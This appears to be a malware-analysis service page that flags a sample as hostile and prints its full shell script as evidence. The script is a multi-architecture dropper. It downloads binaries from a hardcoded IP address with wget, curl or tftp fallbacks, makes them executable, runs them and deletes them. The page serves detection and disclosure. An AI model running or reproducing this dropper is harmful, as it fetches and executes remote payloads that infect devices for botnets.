Hostile 100% Download

1cecd1285570641edccd245efc7376b39aab3399ed38245644663599bef75329.unknown

Multi-arch malware dropper downloads and executes binaries

Multi-architecture protocol fallback executionVariable-host fallback download executes payload
SHA-2561cecd1285570641edccd245efc7376b39aab3399ed38245644663599bef75329

Evidence

Fetch URL host is a variable lines 1–10
1binarys="mips mipsel x86 arm7 arm4 sh4 arm6 arm5 ppc arc"
2server_ip="62.60.157.229"
3for arch in $binarys
4do
5rm -rf $arch
6wget http://$server_ip/$arch || curl -O http://$server_ip/$arch || tftp $server_ip -c get $arch || tftp -g -r $arch $server_ip
7chmod 777 $arch
8./$arch $1.$arch
9rm -rf $arch
10done

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.